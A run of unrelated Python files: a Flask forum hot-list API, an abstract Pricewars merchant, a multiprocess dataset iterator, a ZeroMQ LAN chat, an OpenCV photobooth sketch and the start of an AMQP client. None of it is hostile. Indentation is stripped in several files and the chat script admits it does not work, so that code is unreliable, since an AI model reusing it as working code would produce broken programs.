        result = spider_func()
        output = {
            'code': 0,
            'msg': 'success',
            'data': result
        }
    except Exception as e:
        api.logger.error(e)
        output = {
            'code': 1111,
            'msg': 'failed to fetch the hot list',
            'data': [],
        }
    output = json.dumps(output)
    api.redis_con.set(key, output, ex=60 * 60)  # cache for 1 hour; ex expects seconds as an int
@api.route('/<re(".*"):key>')
def get_hot_lists(key):
"""
知乎热榜api
http://127.0.0.1:5000/api/v1_0/zhihu
:return:
"""
if not hasattr(api.hot_spider, key):
return '404 Not Found', 404
spider_func = getattr(api.hot_spider, key)
t1 = Thread(target=cache_hot, args=(api, spider_func, key))
t1.start()
    # Don't wait for the refresh thread to finish; to keep the response fast, serve the cached data even if it is stale.
while True:
result = api.redis_con.get(key)
if not result:
time.sleep(0.1)
continue
output = json.loads(result)
return jsonify(output)
@api.route('/forums')
def get_forum_names():
"""
获取支持的论坛name
:return:
"""
output = [
{'name': '知乎', 'code': 'zhihu'},
{'name': '微博', 'code': 'weibo'},
{'name': '百度贴吧', 'code': 'baidutieba'},
{'name': 'v2ex', 'code': 'v2ex'},
{'name': '天涯', 'code': 'tianya'},
{'name': '豆瓣', 'code': 'douban'},
{'name': '网易新闻', 'code': 'wangyinews'},
# {'name': '煎蛋', 'code': 'jiandan'},
{'name': '黑客派', 'code': 'heikepai'},
{'name': 'it之家', 'code': 'ithome'},
]
return jsonify(output)
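# Illustrative usage sketch (not part of the original module), assuming the blueprint is
# mounted under /api/v1_0 and the Flask app runs locally, as the get_hot_lists docstring
# suggests:
#
#     import requests
#     resp = requests.get('http://127.0.0.1:5000/api/v1_0/zhihu')
#     print(resp.json())   # {'code': 0, 'msg': 'success', 'data': [...]}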
|
pricewars_merchant.py
|
from abc import ABCMeta, abstractmethod
import time
import threading
import hashlib
import base64
from typing import Optional, List
from api import Marketplace, Producer
from server import MerchantServer
from models import SoldOffer, Offer
class PricewarsMerchant(metaclass=ABCMeta):
def __init__(self, port: int, token: Optional[str], marketplace_url: str, producer_url: str, name: str):
self.settings = {
'update interval': 5,
'restock limit': 20,
'order threshold': 0,
'shipping': 5,
'primeShipping': 1,
}
self.state = 'running'
self.server_thread = self.start_server(port)
self.marketplace = Marketplace(token, host=marketplace_url)
self.marketplace.wait_for_host()
if token:
self.token = token
self.merchant_id = self.calculate_id(token)
else:
register_response = self.marketplace.register(port, name)
self.token = register_response.merchant_token
self.merchant_id = register_response.merchant_id
self.producer = Producer(self.token, host=producer_url)
@staticmethod
def calculate_id(token: str) -> str:
return base64.b64encode(hashlib.sha256(token.encode('utf-8')).digest()).decode('utf-8')
def run(self):
start_time = time.time()
while True:
if self.state == 'running':
self.update_offers()
# Waiting for the length of the update interval minus the execution time
time.sleep(self.settings['update interval'] -
((time.time() - start_time) % self.settings['update interval']))
def update_offers(self) -> None:
"""
Entry point for regular merchant activity.
When the merchant is running, this is called in each update interval.
"""
market_situation = self.marketplace.get_offers()
own_offers = [offer for offer in market_situation if offer.merchant_id == self.merchant_id]
inventory_level = sum(offer.amount for offer in own_offers)
if inventory_level <= self.settings['order threshold']:
self.restock(inventory_level, market_situation)
for offer in own_offers:
offer.price = self.calculate_price(offer.offer_id, market_situation)
self.marketplace.update_offer(offer)
def restock(self, inventory_level, market_situation):
order = self.producer.order(self.settings['restock limit'] - inventory_level)
product = order.product
shipping_time = {
'standard': self.settings['shipping'],
'prime': self.settings['primeShipping']
}
offer = Offer.from_product(product, 0, shipping_time)
offer.merchant_id = self.merchant_id
offer.price = self.calculate_price(offer.offer_id, market_situation + [offer])
self.marketplace.add_offer(offer)
def sold_offer(self, offer: SoldOffer) -> None:
"""
This method is called whenever the merchant sells a product.
"""
print('Product sold')
def start(self):
self.state = 'running'
def stop(self):
self.state = 'stopping'
def update_settings(self, new_settings: dict) -> None:
for key, value in new_settings.items():
if key in self.settings:
# Cast value type to the type that is already in the settings dictionary
value = type(self.settings[key])(value)
self.settings[key] = value
def start_server(self, port):
server = MerchantServer(self)
thread = threading.Thread(target=server.app.run, kwargs={'host': '0.0.0.0', 'port': port})
thread.daemon = True
thread.start()
return thread
@abstractmethod
def calculate_price(self, offer_id: int, market_situation: List[Offer]) -> float:
"""
Calculate the price for the offer indicated by 'offer_id' given the current market situation.
The offer id is guaranteed to be in the market situation.
"""
pass
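# Illustrative sketch (not part of the original module): a minimal concrete merchant that
# undercuts the cheapest competing offer by a fixed margin. The margin and the fallback
# price below are assumptions, not values taken from the original code.
class ExampleUndercutMerchant(PricewarsMerchant):
    def calculate_price(self, offer_id: int, market_situation: List[Offer]) -> float:
        competitor_prices = [offer.price for offer in market_situation
                             if offer.merchant_id != self.merchant_id]
        if not competitor_prices:
            return 30.0  # no competition: fall back to a fixed price (assumption)
        return max(min(competitor_prices) - 0.5, 0.01)  # undercut by 0.50, never below 0.01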
|
multiprocess_iterator.py
|
from __future__ import division
import datetime
import multiprocessing
from multiprocessing import sharedctypes # type: ignore
import signal
import sys
import threading
import warnings
import numpy
import six
from pytorch_trainer.dataset import iterator
from pytorch_trainer.iterators import _statemachine
from pytorch_trainer.iterators.order_samplers import ShuffleOrderSampler
_response_time = 0.1
def _raise_timeout_warning():
warnings.warn(
'Stalled dataset is detected. '
'See the documentation of MultiprocessIterator for common causes and '
'workarounds:\n'
'https://docs.chainer.org/en/stable/reference/generated/'
'pytorch_trainer.iterators.MultiprocessIterator.html',
MultiprocessIterator.TimeoutWarning)
class MultiprocessIterator(iterator.Iterator):
"""Dataset iterator that loads examples in parallel.
This is an implementation of :class:`~pytorch_trainer.dataset.Iterator` that loads
examples with worker processes. It uses the standard :mod:`multiprocessing`
module to parallelize the loading. The dataset is sent to the worker
processes in the standard way using pickle.
Note that this iterator effectively prefetches the examples for the next
batch asynchronously after the current batch is returned.
This iterator saves ``-1`` instead of ``None`` in snapshots since some
serializers do not support ``None``.
.. note::
When you are using OpenCV somewhere in your code and the
``MultiprocessIterator`` is used in the training code, the
        training loop may get stuck at some point. In such a situation,
        there are several workarounds to prevent the process from getting stuck.
1. Set the environment variable as follows: ``OMP_NUM_THREADS=1``
2. Add ``cv2.setNumThreads(0)`` right after ``import cv2`` in your
training script.
3. Use :class:`~pytorch_trainer.iterators.MultithreadIterator` instead of
``MultiprocessIterator``.
Args:
dataset (~pytorch_trainer.dataset.Dataset): Dataset to iterate.
batch_size (int): Number of examples within each batch.
repeat (bool): If ``True``, it infinitely loops over the dataset.
Otherwise, it stops iteration at the end of the first epoch.
shuffle (bool): If ``True``, the order of examples is shuffled at the
beginning of each epoch. Otherwise, examples are extracted in the
order of indexes. If ``None`` and no ``order_sampler`` is given,
the behavior is the same as the case with ``shuffle=True``.
n_processes (int): Number of worker processes. The number of CPUs is
used by default.
n_prefetch (int): Number of prefetch batches.
shared_mem (int): The size of using shared memory per data.
If ``None``, size is adjusted automatically.
dataset_timeout (float): :class:`MultiprocessIterator.TimeoutWarning`
will be issued after this time in seconds elapsed in each dataset
realization. ``None`` to disable the warning. You can turn this
warning into an error by using :func:`warnings.simplefilter`::
warnings.simplefilter(
'error',
pytorch_trainer.iterators.MultiprocessIterator.TimeoutWarning)
order_sampler (callable): A callable that generates the order
            of the indices to sample in the next epoch when an epoch finishes.
This function should take two arguments: the current order
and the current position of the iterator.
This should return the next order. The size of the order
should remain constant.
This option cannot be used when ``shuffle`` is not ``None``.
maxtasksperchild (int): Number of tasks a worker of prefetch process
can complete before it will exit and be replaced with a fresh
worker process, to enable unused resources to be freed. If
``None``, worker processes will live as long as the pool.
"""
class TimeoutWarning(RuntimeWarning):
pass
_interruption_testing = False # for testing
_finalized = False
_prefetch_loop = None
_comm = None
def __init__(self, dataset, batch_size, repeat=True, shuffle=None,
n_processes=None, n_prefetch=1, shared_mem=None,
order_sampler=None, dataset_timeout=30.0,
maxtasksperchild=None):
self.dataset = dataset
self.batch_size = batch_size
self.repeat = repeat
self.shuffle = shuffle
self.n_processes = n_processes or multiprocessing.cpu_count()
self.n_prefetch = max(n_prefetch, 1)
self.shared_mem = shared_mem
self.dataset_timeout = dataset_timeout
self._maxtasksperchild = maxtasksperchild
if self.shuffle is not None:
if order_sampler is not None:
raise ValueError('`shuffle` is not `None` and a custom '
'`order_sampler` is set. Please set '
'`shuffle` to `None` to use the custom '
'order sampler.')
else:
if self.shuffle:
order_sampler = ShuffleOrderSampler()
else:
if order_sampler is None:
order_sampler = ShuffleOrderSampler()
self.order_sampler = order_sampler
self._initialize_loop()
def _initialize_loop(self):
self._comm = _Communicator(self.n_prefetch, self.dataset_timeout)
self.reset()
self._prefetch_loop = _PrefetchLoop(
self.dataset, self.batch_size, self.repeat,
self.n_processes, self.n_prefetch, self.shared_mem,
self._comm, self.order_sampler,
self._interruption_testing, self._maxtasksperchild)
# defer launching prefetch thread until creating the worker pool,
# not to leave a background thread in forked processes.
def __next__(self):
measure_mode = False
if self._prefetch_loop.thread is None:
if self._prefetch_loop.measure_required():
measure_mode = True
batch, state = self._prefetch_loop.measure(
self.dataset_timeout)
self._prefetch_loop.launch_thread()
if not measure_mode:
batch, state = self._comm.get()
self._previous_epoch_detail = self.epoch_detail
self._state = state
if batch is None:
raise StopIteration
else:
return batch
next = __next__
def finalize(self):
if self._finalized:
return
if self._comm is not None:
self._comm.terminate()
if self._prefetch_loop is not None:
self._prefetch_loop.terminate()
self._comm = None
self._prefetch_loop = None
self._finalized = True
def __copy__(self):
# This function is implemented for backward compatibility.
# Please use `reset` normally.
other = MultiprocessIterator(
self.dataset, self.batch_size, self.repeat, shuffle=None,
n_processes=self.n_processes, n_prefetch=self.n_prefetch,
shared_mem=self.shared_mem, order_sampler=self.order_sampler)
other._reset_state(self.current_position, self.epoch,
self.is_new_epoch, self._state.order)
other._previous_epoch_detail = self._previous_epoch_detail
return other
@property
def current_position(self):
return self._state.current_position
@property
def epoch(self):
return self._state.epoch
@property
def is_new_epoch(self):
return self._state.is_new_epoch
@property
def epoch_detail(self):
return self.epoch + self.current_position / self._epoch_size
@property
def previous_epoch_detail(self):
if self._previous_epoch_detail < 0:
return None
return self._previous_epoch_detail
def state_dict(self):
state_dict = {
'current_position': self.current_position,
'epoch': self.epoch,
'is_new_epoch': self.is_new_epoch,
}
order = self._state.order.copy()
state_dict['order'] = order
try:
state_dict['previous_epoch_detail'] = self._previous_epoch_detail
except KeyError:
pass
return state_dict
def load_state_dict(self, state_dict):
current_position = state_dict['current_position']
epoch = state_dict['epoch']
is_new_epoch = state_dict['is_new_epoch']
order = self._state.order
if order is not None:
order = state_dict['order']
self._reset_state(
current_position, epoch, is_new_epoch, order)
try:
self._previous_epoch_detail = state_dict['previous_epoch_detail']
except KeyError:
# guess previous_epoch_detail for older version
self._previous_epoch_detail = self.epoch + \
(self.current_position - self.batch_size) / self._epoch_size
if self.epoch_detail > 0:
self._previous_epoch_detail = max(
self._previous_epoch_detail, 0.)
else:
self._previous_epoch_detail = -1.
def reset(self):
if self.order_sampler is None:
order = None
else:
order = self.order_sampler(numpy.arange(len(self.dataset)), 0)
self._reset_state(0, 0, False, order)
self._previous_epoch_detail = -1.
def _reset_state(self, current_position, epoch, is_new_epoch, order):
if self._finalized:
raise NotImplementedError(
'Reset of finalized MultiProcessIterator is currently not '
'supported.')
self._state = _statemachine.IteratorState(
current_position, epoch, is_new_epoch, order)
self._comm.reset(self._state)
@property
def _epoch_size(self):
order = self._state.order
if order is None:
epoch_size = len(self.dataset)
else:
epoch_size = len(order)
return epoch_size
def __getstate__(self):
        # We trick the serializer into filling a dict for us; this allows us
        # to use the same code for both pytorch_trainer and pickle serializers.
state = self.state_dict()
self._reset_state(self.current_position, self.epoch,
self.is_new_epoch, state['order'])
        # Unpickling resets the instance without calling __init__.
        # Chainer serializers dump the state into an existing object,
        # hence we also need to save the initial parameters.
init = self.__dict__.copy()
del init['_comm']
del init['_state']
del init['_prefetch_loop']
# TODO(ecastill): When pickling this object there is the risk to copy
# the entire dataset. If the dataset is entirely in memory
# it can be duplicated when spawning new processes.
state['init'] = init
return state
def __setstate__(self, state):
self.__dict__.update(state['init'])
self._initialize_loop()
# Iterator state is restored after initialization
self._reset_state(state['current_position'], state['epoch'],
state['is_new_epoch'], state['order'])
self._previous_epoch_detail = state['previous_epoch_detail']
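# Illustrative usage sketch (not part of the original module); the toy dataset below is
# an assumption:
#
#     dataset = [numpy.random.rand(3, 32, 32).astype(numpy.float32) for _ in range(1000)]
#     it = MultiprocessIterator(dataset, batch_size=32, n_processes=4)
#     batch = next(it)   # a list of 32 examples, prefetched by worker processes
#     ...
#     it.finalize()      # always shut the worker pool down when done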
class _Communicator(object):
STATUS_CONTINUE = 0
STATUS_RESET = 1
STATUS_TERMINATE = 2
def __init__(self, n_prefetch, dataset_timeout):
self.n_prefetch = n_prefetch
self.dataset_timeout = dataset_timeout
self._lock = threading.Lock()
self._not_empty_cond = threading.Condition(self._lock)
self._not_full_cond = threading.Condition(self._lock)
self._batch_queue = []
self._status = _Communicator.STATUS_CONTINUE
self._reset_count = 0
@property
def is_terminated(self):
with self._lock:
return self._status == _Communicator.STATUS_TERMINATE
# called from iterator
def get(self):
with self._lock:
start = datetime.datetime.now()
while not self._batch_queue:
self._not_empty_cond.wait(_response_time)
dt = datetime.datetime.now() - start
if (self.dataset_timeout is not None
and dt > datetime.timedelta(
seconds=self.dataset_timeout)):
_raise_timeout_warning()
batch, prefetch_state = self._batch_queue.pop(0)
self._not_full_cond.notify()
return batch, prefetch_state
# called from iterator
def reset(self, prefetch_state):
with self._lock:
self._status = _Communicator.STATUS_RESET
self._prefetch_state = prefetch_state
self._batch_queue = []
self._not_full_cond.notify()
self._reset_count += 1
# called from iterator
def terminate(self):
with self._lock:
self._status = _Communicator.STATUS_TERMINATE
self._batch_queue = []
self._not_full_cond.notify()
self._reset_count += 1
# called from thread
def check(self):
with self._lock:
status = self._status
self._status = _Communicator.STATUS_CONTINUE
prefetch_state = None
if status == _Communicator.STATUS_RESET:
prefetch_state = self._prefetch_state
return status, prefetch_state, self._reset_count
# called from thread
def put(self, batch, prefetch_state, reset_count):
with self._lock:
if len(self._batch_queue) == self.n_prefetch:
self._not_full_cond.wait()
if reset_count == self._reset_count:
self._batch_queue.append((batch, prefetch_state))
self._not_empty_cond.notify()
class _PrefetchLoop(object):
_thread = None
_pool = None
_terminating = False
def __init__(self, dataset, batch_size, repeat,
n_processes, n_prefetch, mem_size, comm,
order_sampler,
_interruption_testing, maxtasksperchild):
self.dataset = dataset
self.batch_size = batch_size
self.repeat = repeat
self.n_processes = n_processes
self.mem_size = mem_size
self._comm = comm
self.order_sampler = order_sampler
self.maxtasksperchild = maxtasksperchild
self._allocate_shared_memory()
self._interruption_testing = _interruption_testing
def terminate(self):
self._terminating = True
# Terminate the thread first because it depends on the pool.
if self._thread is not None:
while self._thread.is_alive():
self._thread.join(_response_time)
if self._pool is not None:
self._pool.terminate()
self._thread = None
self._pool = None
@property
def thread(self):
return self._thread
def measure_required(self):
return self.mem_size is None
def measure(self, dataset_timeout):
# dataset_timeout: timeout in seconds or None
status, prefetch_state, _ = self._comm.check()
if status == _Communicator.STATUS_RESET:
self.prefetch_state = prefetch_state
self.prefetch_state, indices = _statemachine.iterator_statemachine(
self.prefetch_state, self.batch_size, self.repeat,
self.order_sampler, len(self.dataset))
if indices is None: # stop iteration
batch = None
else:
batch_ret = [None]
def fetch_batch():
batch_ret[0] = [self.dataset[idx] for idx in indices]
if dataset_timeout is None:
# Timeout is not set: fetch synchronously
fetch_batch()
else:
# Timeout is set: fetch asynchronously and watch for timeout
thr = threading.Thread(target=fetch_batch)
thr.daemon = True
thr.start()
thr.join(dataset_timeout)
if thr.is_alive():
_raise_timeout_warning()
thr.join()
batch = batch_ret[0]
self.mem_size = max(map(_measure, batch))
self._allocate_shared_memory()
return batch, self.prefetch_state
def _allocate_shared_memory(self):
if self.measure_required():
self.mem_bulk = None
else:
self.mem_bulk = \
sharedctypes.RawArray('b', self.batch_size * self.mem_size)
def launch_thread(self):
self._pool = multiprocessing.Pool(
processes=self.n_processes,
initializer=_fetch_setup,
initargs=(self.dataset, self.mem_size, self.mem_bulk),
maxtasksperchild=self.maxtasksperchild)
if self._interruption_testing:
pids = self._pool.map(_report_pid, range(self.n_processes))
print(' '.join(map(str, pids)))
sys.stdout.flush()
thread = threading.Thread(target=self._run, name='prefetch_loop')
        thread.daemon = True  # setDaemon() is deprecated since Python 3.10
thread.start()
self._thread = thread
return thread
def _run(self):
# The entry routine of the prefetch thread.
alive = True
try:
while alive:
if self._terminating:
break
alive = self._task()
finally:
self._pool.close()
self._pool.join()
def _task(self):
# Do a single task in the prefetch thread.
# Returns a bool indicating whether the loop should continue running.
status, prefetch_state, reset_count = self._comm.check()
if status == _Communicator.STATUS_RESET:
self.prefetch_state = prefetch_state
elif status == _Communicator.STATUS_TERMINATE:
return False # stop loop
self.prefetch_state, indices = _statemachine.iterator_statemachine(
self.prefetch_state, self.batch_size, self.repeat,
self.order_sampler, len(self.dataset))
if indices is None: # stop iteration
batch = None
else:
future = self._pool.map_async(_fetch_run, enumerate(indices))
while True:
try:
data_all = future.get(_response_time)
except multiprocessing.TimeoutError:
if self._comm.is_terminated:
return False
else:
break
batch = [_unpack(data, self.mem_bulk) for data in data_all]
self._comm.put(batch, self.prefetch_state, reset_count)
return True
# Using a parameterized callable (e.g. a bound method) with Pool is tricky due to
# restrictions imposed by pickle, and picklable types differ across Python versions.
# Using a top-level function with module-level globals is the safest option.
# This does not break thread safety or leak globals between processes,
# because each worker process has its own address space.
# To keep static linters happy, we initialize the global variables first.
_fetch_dataset = None
_fetch_mem_size = None
_fetch_mem_bulk = None
def _fetch_setup(dataset, mem_size, mem_bulk):
global _fetch_dataset, _fetch_mem_size, _fetch_mem_bulk
signal.signal(signal.SIGINT, signal.SIG_IGN)
_fetch_dataset = dataset
_fetch_mem_size = mem_size
_fetch_mem_bulk = mem_bulk
def _fetch_run(inputs):
i, index = inputs
data = _fetch_dataset[index]
if _fetch_mem_bulk is not None:
offset = i * _fetch_mem_size
limit = offset + _fetch_mem_size
data = _pack(data, _fetch_mem_bulk, offset, limit)
return data
def _report_pid(_): # for testing
return multiprocessing.current_process().pid
class _PackedNdarray(object):
def __init__(self, array, mem, offset):
self.shape = array.shape
self.dtype = array.dtype
self.nbytes = array.nbytes
self.size = array.size
self.offset = offset
total = self.offset + self.nbytes
if total > len(mem):
raise ValueError(
'Shared memory size is too small. expect:{}, actual:{}'.format(
total, len(mem)))
target = numpy.frombuffer(mem, self.dtype, self.size, self.offset)
target[...] = array.ravel()
def unpack(self, mem):
ret = numpy.frombuffer(mem, self.dtype, self.size, self.offset)
ret = ret.reshape(self.shape).copy()
return ret
def _measure(data):
    expect = 0
    t = type(data)
    if t is tuple or t is list:
        for v in data:
            if isinstance(v, numpy.ndarray):
                expect += v.nbytes
    elif t is dict:
        # measure the values, not the keys, of a dict sample
        for v in six.itervalues(data):
            if isinstance(v, numpy.ndarray):
                expect += v.nbytes
    elif t is numpy.ndarray:
        expect = data.nbytes
    return expect
def _pack(data, mem, offset, limit):
if len(mem) == 0:
return data
t = type(data)
over = False
if t is tuple or t is list:
ret = []
for v in data:
if isinstance(v, numpy.ndarray):
if v.nbytes + offset > limit:
over = True
else:
v = _PackedNdarray(v, mem, offset)
offset += v.nbytes
ret.append(v)
data = t(ret)
elif t is dict:
ret = {}
for k, v in six.iteritems(data):
if isinstance(v, numpy.ndarray):
if v.nbytes + offset > limit:
over = True
else:
v = _PackedNdarray(v, mem, offset)
offset += v.nbytes
ret[k] = v
data = ret
elif t is numpy.ndarray:
if data.nbytes + offset > limit:
over = True
else:
data = _PackedNdarray(data, mem, offset)
offset += data.nbytes
if over:
expect = _measure(data)
warnings.warn(
'Shared memory size is too small.\n' +
'Please set shared_mem option for MultiprocessIterator.\n' +
'Expect shared memory size: {} bytes.\n'.format(expect) +
'Actual shared memory size: {} bytes.'.format(limit - offset),
UserWarning)
return data
def _unpack(data, mem):
if len(mem) == 0:
return data
t = type(data)
if t is tuple or t is list:
ret = []
for v in data:
if isinstance(v, _PackedNdarray):
v = v.unpack(mem)
ret.append(v)
data = t(ret)
elif t is dict:
ret = {}
for k, v in six.iteritems(data):
if isinstance(v, _PackedNdarray):
v = v.unpack(mem)
ret[k] = v
data = ret
elif t is _PackedNdarray:
data = data.unpack(mem)
return data
|
p2p.py
|
#Code definitely doesn't work. Will deliver free Canes on Monday for extra credit
try:
raw_input
except NameError:
raw_input = input
import argparse
import os
from threading import Thread
# dependency, not in stdlib
from netifaces import interfaces, ifaddresses, AF_INET
import zmq
def listen(masked):
"""listen for messages
masked is the first three parts of an IP address:
192.168.1
The socket will connect to all of X.Y.Z.{1-254}.
"""
ctx = zmq.Context.instance()
listener = ctx.socket(zmq.SUB)
for last in range(1, 255):
listener.connect("tcp://{0}.{1}:9000".format(masked, last))
listener.setsockopt(zmq.SUBSCRIBE, b'')
while True:
try:
print(listener.recv_string())
except (KeyboardInterrupt, zmq.ContextTerminated):
break
def main():
parser = argparse.ArgumentParser()
parser.add_argument("interface", type=str, help="the network interface",
choices=interfaces(),
)
parser.add_argument("user", type=str, default=os.environ['USER'],
nargs='?',
help="Your username",
)
args = parser.parse_args()
inet = ifaddresses(args.interface)[AF_INET]
addr = inet[0]['addr']
masked = addr.rsplit('.', 1)[0]
ctx = zmq.Context.instance()
listen_thread = Thread(target=listen, args=(masked,))
listen_thread.start()
bcast = ctx.socket(zmq.PUB)
bcast.bind("tcp://%s:9000" % args.interface)
print("starting chat on %s:9000 (%s.*)" % (args.interface, masked))
while True:
try:
msg = raw_input()
bcast.send_string("%s: %s" % (args.user, msg))
except KeyboardInterrupt:
break
bcast.close(linger=0)
ctx.term()
if __name__ == '__main__':
main()
|
photobooth.py
|
import cv2
import numpy as np
import serial  # load the serial library
import threading
import time
# Start the camera
captura = cv2.VideoCapture(0)
# Start the serial communication
#ser = serial.Serial('/dev/ttyACM0', 9600)
def showVideo(cap):
    key = 0
    print("hola")
    while key != 27:
        print("hola2")
        flag, frame = cap.read()
        print("frame")
        cv2.putText(frame, "3", (100, 80), cv2.FONT_HERSHEY_SIMPLEX, 2, 255)
        print("lalla")
        time.sleep(1)
        cv2.imshow('PON UNA POSE GUAPA!', frame)
        time.sleep(1)
        key = cv2.waitKey(5) & 0xFF
thread = threading.Thread(target=showVideo, args=(captura,))
key=0
numSnapshot=0
first=True
while(key!=27):
key = cv2.waitKey(5) & 0xFF
if first:
first=False
thread.start()
#if ser.read()=='s':
    #    print "received"
# flag, frame = captura.read()
#if flag:
# cv2.imshow('ESTA ES TU FOTO!', frame)
# cv2.imwrite("%d.png"%numSnapshot, frame)
#numSnapshot+=1
#else:
# print "Try again"
cv2.destroyAllWindows()
#thread.exit()
|
client.py
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# pylint: disable=too-many-lines
import logging
import threading
import time
import uuid
from uamqp import (Connection, Session, address, authentication, c_uamqp,
compat, constants, errors, receiver, sender)
from uamqp.constants import TransportType
_logger = logging.getLogger(__name__)
class AMQPClient(object):
"""An AMQP client.
:param remote_address: The AMQP endpoint to connect to. This could be a send target
or a receive source.
:type remote_address: str, bytes or ~uamqp.address.Address
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
     If no authentication is supplied, SASLAnonymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, remote_address, auth=None, client_name=None, debug=False,
error_policy=None, keep_alive_interval=None, **kwargs):
self._cbs = None
self._encoding = kwargs.pop('encoding', None) or 'UTF-8'
self._transport_type = kwargs.pop('transport_type', None) or TransportType.Amqp
self._http_proxy = kwargs.pop('http_proxy', None)
self._remote_address = remote_address if isinstance(remote_address, address.Address) \
else address.Address(remote_address)
self._hostname = self._remote_address.hostname
if not auth:
username = self._remote_address.username
password = self._remote_address.password
if username and password:
username = compat.unquote_plus(username)
password = compat.unquote_plus(password)
auth = authentication.SASLPlain(
self._hostname, username, password,
http_proxy=self._http_proxy,
transport_type=self._transport_type)
self._auth = auth if auth else authentication.SASLAnonymous(
self._hostname,
http_proxy=self._http_proxy,
transport_type=self._transport_type)
self._name = client_name if client_name else str(uuid.uuid4())
self._debug_trace = debug
self._counter = c_uamqp.TickCounter()
self._shutdown = False
self._connection = None
self._ext_connection = False
self._session = None
self._backoff = 0
self._error_policy = error_policy or errors.ErrorPolicy()
self._keep_alive_interval = int(keep_alive_interval) if keep_alive_interval else 0
self._keep_alive_thread = None
# Connection settings
self._max_frame_size = kwargs.pop('max_frame_size', None) or constants.MAX_FRAME_SIZE_BYTES
self._channel_max = kwargs.pop('channel_max', None)
self._idle_timeout = kwargs.pop('idle_timeout', None)
self._properties = kwargs.pop('properties', None)
self._remote_idle_timeout_empty_frame_send_ratio = kwargs.pop(
'remote_idle_timeout_empty_frame_send_ratio', None)
# Session settings
self._outgoing_window = kwargs.pop('outgoing_window', None) or constants.MAX_FRAME_SIZE_BYTES
self._incoming_window = kwargs.pop('incoming_window', None) or constants.MAX_FRAME_SIZE_BYTES
self._handle_max = kwargs.pop('handle_max', None)
self._on_attach = kwargs.pop('on_attach', None)
# Link settings
self._send_settle_mode = kwargs.pop('send_settle_mode', None) or constants.SenderSettleMode.Unsettled
self._receive_settle_mode = kwargs.pop('receive_settle_mode', None) or constants.ReceiverSettleMode.PeekLock
self._desired_capabilities = kwargs.pop('desired_capabilities', None)
# AMQP object settings
self.message_handler = None
self.connection_type = Connection
self.session_type = Session
if kwargs:
raise ValueError("Received unrecognized kwargs: {}".format(", ".join(kwargs.keys())))
def __enter__(self):
"""Run Client in a context manager."""
self.open()
return self
def __exit__(self, *args):
"""Close and destroy Client on exiting a context manager."""
self.close()
def _keep_alive(self):
start_time = self._counter.get_current_ms()
try:
while self._connection and not self._shutdown:
current_time = self._counter.get_current_ms()
elapsed_time = (current_time - start_time)/1000
if elapsed_time >= self._keep_alive_interval:
_logger.debug("Keeping %r connection alive.", self.__class__.__name__)
self._connection.work()
start_time = current_time
time.sleep(1)
except Exception as e: # pylint: disable=broad-except
_logger.info("Connection keep-alive for %r failed: %r.", self.__class__.__name__, e)
def _client_ready(self): # pylint: disable=no-self-use
"""Determine whether the client is ready to start sending and/or
receiving messages. To be ready, the connection must be open and
authentication complete.
:rtype: bool
"""
return True
def _client_run(self):
"""Perform a single Connection iteration."""
self._connection.work()
def _redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
# pylint: disable=protected-access
if not self._cbs:
_logger.debug("Closing non-CBS session.")
self._session.destroy()
self._session = None
self._auth = auth
self._hostname = self._remote_address.hostname
self._connection.redirect(redirect, auth)
self._build_session()
def _build_session(self):
"""Build self._session based on current self.connection.
"""
if not self._cbs and isinstance(self._auth, authentication.CBSAuthMixin):
self._cbs = self._auth.create_authenticator(
self._connection,
debug=self._debug_trace,
incoming_window=self._incoming_window,
outgoing_window=self._outgoing_window,
handle_max=self._handle_max,
on_attach=self._on_attach)
self._session = self._auth._session # pylint: disable=protected-access
elif self._cbs:
self._session = self._auth._session # pylint: disable=protected-access
else:
self._session = self.session_type(
self._connection,
incoming_window=self._incoming_window,
outgoing_window=self._outgoing_window,
handle_max=self._handle_max,
on_attach=self._on_attach)
def open(self, connection=None):
"""Open the client. The client can create a new Connection
or an existing Connection can be passed in. This existing Connection
